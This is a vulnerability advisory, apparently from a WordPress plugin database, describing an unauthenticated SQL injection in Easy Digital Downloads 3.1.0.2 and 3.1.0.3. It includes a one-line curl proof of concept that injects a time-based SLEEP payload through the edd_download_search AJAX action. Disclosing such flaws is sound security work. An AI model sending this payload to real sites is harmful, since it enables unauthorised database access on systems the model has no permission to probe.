WordPress Plugin Vulnerabilities
Easy Digital Downloads 3.1.0.2 & 3.1.0.3 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape the s parameter before using it in a SQL statement via the edd_download_search AJAX action , leading to a SQL injection exploitable by unauthenticated users
Proof of Concept
curl "https://example.com/wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-"
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Joshua Martinelle (Tenable)
Verified
No
WPVDB ID
Timeline
Publicly Published
2023-01-12 (about 1 years ago)
Added
2023-01-20 (about 1 years ago)
Last Updated
2023-01-20 (about 1 years ago)